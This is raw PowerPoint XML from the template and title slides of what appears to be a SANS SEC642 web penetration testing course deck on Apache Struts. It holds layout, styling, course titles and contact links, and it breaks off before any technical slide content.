                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT"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36448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6931703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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.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image" Target="../media/image2.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="rId9"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Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="472440" y="4851400"/>
            <a:ext cx="11247120" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9D9D9"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:no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400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="005C7D"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472442" y="475840"/>
            <a:ext cx="3568618" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B111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bwMode="gray">
          <a:xfrm>
            <a:off x="655321" y="475840"/>
            <a:ext cx="3385738" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="64008" rIns="91440" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2404314" y="1918425"/>
            <a:ext cx="9315246" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2061412" y="1918425"/>
            <a:ext cx="0" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="7F7F7F"/>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6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="689811" y="2804224"/>
            <a:ext cx="1028700" cy="549025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4035323" y="475488"/>
            <a:ext cx="7684238" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7F7F7F"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:no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400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="005C7D"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="4035323" y="442452"/>
            <a:ext cx="0" cy="759542"/>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9200581"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483784" r:id="rId1"/>
    <p:sldLayoutId id="2147483794" r:id="rId2"/>
    <p:sldLayoutId id="2147483796" r:id="rId3"/>
    <p:sldLayoutId id="2147483797" r:id="rId4"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="1800" b="1" i="0" kern="1200" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Gill Sans MT" charset="0"/>
          <a:ea typeface="Gill Sans MT" charset="0"/>
          <a:cs typeface="Gill Sans MT" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buNone/>
        <a:defRPr sz="6000" kern="1200">
          <a:solidFill>
            <a:srgbClr val="B11116"/>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6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6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6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6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Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="1524" y="6311900"/>
            <a:ext cx="12188952" cy="54864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bwMode="gray">
          <a:xfrm>
            <a:off x="655320" y="365125"/>
            <a:ext cx="10881360" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="64008" rIns="91440" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655320" y="1504335"/>
            <a:ext cx="10881360" cy="4247536"/>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1" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1016000" y="6311900"/>
            <a:ext cx="0" cy="54610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245909" y="6439685"/>
            <a:ext cx="559187" cy="298743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1245598" y="6300217"/>
            <a:ext cx="10309775" cy="546101"/>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100" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="609585" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1219170" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828754" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2438339" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3047924" algn="l" defTabSz="1219170" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3657509" algn="l" defTabSz="1219170" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4267093" algn="l" defTabSz="1219170" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4876678" algn="l" defTabSz="1219170" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>SEC642 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11538204" y="6316005"/>
            <a:ext cx="653796" cy="546101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1100" b="1" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="609585" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1219170" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828754" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2438339" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3047924" algn="l" defTabSz="1219170" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3657509" algn="l" defTabSz="1219170" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4267093" algn="l" defTabSz="1219170" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4876678" algn="l" defTabSz="1219170" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A12C446D-6113-E749-B2D6-33109B9D4DC9}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1629723000"/>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5" r:id="rId9"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2200" b="1" i="0" kern="1200" cap="all" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Gill Sans MT" charset="0"/>
          <a:ea typeface="Gill Sans MT" charset="0"/>
          <a:cs typeface="Gill Sans MT" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buNone/>
        <a:defRPr sz="2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="466725" indent="-233363" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="685800" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="2200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="919163" indent="-233363" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1152525" indent="-233363" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>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hyperlink" Target="https://www.sans.org/event/august-sydney-2018/course/enterprise-threat-vulnerability-assessment"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mailto:press@sans.org" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:justin@meeas.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:tuition@sans.org" TargetMode="External"/><Relationship Id="rId12"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1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:registration@sans.org" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:info@sans.org" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:adriendb@gmail.com" TargetMode="External"/><Relationship Id="rId9"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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>SEC642</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java on the server? What could possibly go wrong? Struts your stuff!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2012-2018 Justin Searle, Moses Hernandez, and Adrien de Beaupré  |  All Rights Reserved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced Web Application Penetration Testing, Ethical Hacking, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1638863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B489784-C2E9-43B7-A754-088C41BF9A00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
              <a:t>How does it work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{856156C1-D88A-41C8-ABB6-F9A70A57B9CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
